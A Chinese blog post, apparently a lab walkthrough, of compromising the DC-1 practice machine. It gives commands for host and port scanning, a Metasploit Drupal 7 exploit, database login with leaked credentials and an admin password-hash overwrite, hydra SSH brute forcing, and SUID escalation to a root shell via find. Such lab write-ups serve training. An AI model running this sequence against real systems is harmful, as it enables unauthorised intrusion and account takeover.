【DC-1靶场渗透】


前言

本期讲解dc-1靶机渗透过程


一.信息收集

1.主机发现

nmap -sP 192.168.1.0/24 //扫描自己网段存活的主机

2.端口扫描

nmap -sT -p- --min-rate 2000 192.168.1.8  

在这里插入图片描述
发现开放了22,80等知名端口

二.查找漏洞

1.登陆页面


可以看到内容管理系统版本drupal 7
由此可尝试查看有无可利用的漏洞

2.msf利用

searchsploit drupal

msfconsole
search drupal 7.x
use 0
show options
set rhosts 192.168.1.8
run


在这里插入图片描述

3.获取flag1

shell
python -c 'import pty;pty.spawn("/bin/bash")'

4.获取flag2

查找可疑文件
在sites/default/default.setting.php中找到flag2

可以看到给出了数据库用户名和密码
可以登录数据库看看

三.登录数据库

1.修改admin密码

mysql -udbuser -pR0ck3t
show databases;
use drupaldb;
show tables;
slect * from users;

在这里插入图片描述
生成自定义的哈希密码进行修改

php scripts/password-hash.sh password

update users set pass="$s$DRYYqPjar/0Po8UWLFN0II/0.77dz7Q16YQXvyaB6cl0EJr6vEIy" where uid=1;

2.登录获取flag3

四.ssh爆破

1.查看敏感文件


可以看到有flag4用户,并且可以登录,但是不知道密码,尝试爆破

hydra -l flag4 -P /usr/share/john/password.lst 192.168.1.8 ssh

2.ssh登录

ssh flag4@192.168.1.8

3.获取flag4

在这里插入图片描述

五.提权

1.SUID位提权

find / -user root -perm -4000 -print 2>/dev/null //查找具有suid位的命令

2.登录网站查询

查询提权命令网站

find . -exec /bin/sh \; -quit

3.获取最终的flag

在这里插入图片描述


总结

多打靶机熟悉技能

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值